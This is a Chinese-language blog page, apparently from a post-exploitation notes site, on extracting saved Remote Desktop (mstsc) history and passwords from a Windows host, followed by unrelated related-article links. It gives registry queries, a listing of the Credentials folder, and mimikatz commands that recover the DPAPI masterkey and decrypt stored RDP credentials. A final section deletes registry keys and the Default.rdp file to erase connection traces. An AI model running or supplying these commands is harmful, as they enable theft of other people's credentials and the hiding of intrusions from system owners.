读取mstsc历史密码

  • 通过注册表查看历史记录
  • 通过本地Credentials
    • 读取记录
    • 使用mimikatz读取密码(需要保存过凭证的才可以)
  • 日志清除
  • 参考文章

通过注册表查看历史记录

reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\Servers" /s

通过本地Credentials

读取记录

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

使用mimikatz读取密码(需要保存过凭证的才可以)

mimikatz dpapi::cred /in:C:\Users\xxxx\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6

通过获取到的guidMasterKey

来寻找MasterKey

mimikatz privilege::debug sekurlsa::dpapi

红色和上面的对应

masterkey下面要用到

mimikatz # dpapi::cred /in:C:\Users\xxx\AppData\Local\Microsoft\Credentials\EE1A4100890230A55C3C07FF6747BBF5 /masterkey:8f6e4ad433937955a7ee7d309798d08a44f1ea3c44b15725d37f834493644257e2f99c556e0fb1e81243c878168dc2dbe59a1310f189c90f67962ebf3072cfdb

日志清除

reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f # 删除Default中的所有值
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f # 删除整个Servers
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" 重新创建删除的注册表项
cd %userprofile%\documents\ # 转到Default.rdp文件目录
attrib Default.rdp -s -h # 更改Default.rdp文件属性,默认情况下它是隐藏
del Default.rdp  # 删除文件Default.rdp文件

参考文章

https://blog.csdn.net/q1352483315/article/details/100075078

读取mstsc历史密码相关推荐

  1. Spring Security自定义登录验证,验证码,动态管理uri访问权限,Thymeleaf,限制密码强度、过期、错误密码锁定超时自动解锁、禁用历史密码、新密码和现密码差异要求编辑距离

    在本教程中,我将指导您如何编写代码,以使用具有基于表单的身份验证的Spring安全API来保护Spring Boot应用程序中的网页.用户详细信息存储在MySQL数据库中,并使用春季JDBC连接到数据 ...

  2. Spring Security登录验证,验证码,动态管理uri访问权限,Thymeleaf,限制密码强度、过期、错误密码锁定超时自动解锁、禁用历史密码、新密码和现密码差异要求编辑距离

    在本教程中,我将指导您如何编写代码,以使用具有基于表单的身份验证的Spring安全API来保护Spring Boot应用程序中的网页.用户详细信息存储在MySQL数据库中,并使用春季JDBC连接到数据 ...

  3. Spring Security 定制UserDetailsService,动态uri权限,Thymeleaf,限制密码强度、过期、错误密码锁定超时自动解锁、禁用历史密码、新密码和现密码差异要求编辑距离

    在本教程中,我将指导您如何编写代码,以使用具有基于表单的身份验证的Spring安全API来保护Spring Boot应用程序中的网页.用户详细信息存储在MySQL数据库中,并使用春季JDBC连接到数据 ...

  4. 【安全与风险】概率论与历史密码

    概率论与历史密码 概述 概率 :复习 概率 事件 概率的基本性质 互斥事件 随机变量 独立事件 历史密码 加密和解密 概述 概率论回顾 更新密码学和信息安全的数学基础 历史密码 回到安全和密码学的起源 ...

  5. 限制不能使用最近三次的历史密码

    开发的软件中是允许用户可以更自己的密码,现在客户有这样一个要求,是当用户更新密码时,要限制用户不能重新使用最近三次的历史密码. 实现客户的要求,唯有在数据库,创建一个密码更新Log表,然后再为Memb ...

  6. linux 删除历史密码

    文章目录 背景 解决方法 背景 devcloud 上的云开发机会定时要求更新密码,要求不能跟旧密码相似,这就导致我修改后经常忘记密码,记录下解决方法 解决方法 登陆 root 用户(如果记得普通用户的 ...

  7. 手工破解还原精灵密码(简单得很),另附,在线读取还原精灵密码

    打开Winhex(一种类似记事本的编辑工具,不过功能强得多,在网上搜吧,可以免费下的,多得很),先不管, 然后右键单击右下角的还原精灵图标,点击"设定参数",点击"更改密 ...

  8. 【网页读取自动填充密码】

    网页读取自动填充密码 打开网页,进入开发者模式,ctrl+f查找password 找到type-password,改成text-password,回车即可.

  9. linux中sudo如何读取标准输入作为密码,避免每次都输入密码?

    需求描述: 今天想要在生产环境中,弄自动部署的脚本,但是现在呢,需要sudo权限,每次都要输入.就想看sudo如何能从标准输入读取密码. 操作过程: 1.原来的方法 [deployer@testvm ...

最新文章

  1. FineUI控件集合
  2. OpenGL油画效果
  3. app应用内嵌h5页面怎么直接打开safari_localstroage过多存储满的情况下应该怎么办?...
  4. 如何从头开始使用Python实现堆栈泛化(Stacking)
  5. 数据加密以及国密基础知识
  6. Chrome 扩展程序 CrxMouse Techzero优化版 更新至 v3.0.4
  7. 如何在excel中取消合并单元格后内容自动填充?
  8. X1000对于CPU Core的参数解读(MIPS Cache)
  9. STM32固件库点灯
  10. 485集线器,485Hub、485分配器、485共享器、三级浪涌保护,485星型接法设备 1拖4...
  11. 高鹏清华计算机系,中国最顶尖的学霸到底有多厉害?看完,膝盖已跪碎!
  12. 微信文章临时链接变永久链接
  13. Cmpp MsgId 生成算法
  14. Python-实现trim函数
  15. JAVA语言程序设计教程张席_Java语言程序设计教程
  16. python:正则表达式_re模块
  17. 小学生python游戏编程arcade----基本知识1
  18. JUC详解(各种乱七八糟的锁)
  19. 密钥策略的属性基加密(KP-ABE)
  20. win10 pro 使用远程桌面

热门文章

  1. 怎样花两年时间去面试一个人---刘未鹏
  2. 计算地址掩码和地址数
  3. android 分析boot.img,Android bootimg的详细分析.pdf
  4. 类似百度输入框自动联想功能遇到的问题:Opera浏览器不支持拼音输入法时的keyup事件
  5. 依据经度纬度计算距离方式
  6. office全套教程(2003~2016)
  7. 贝塞尔函数Bessel(原理与实现)
  8. Trello进行时间和项目的管理
  9. vue3 数学公式使用
  10. 输出参数Ruby的p puts print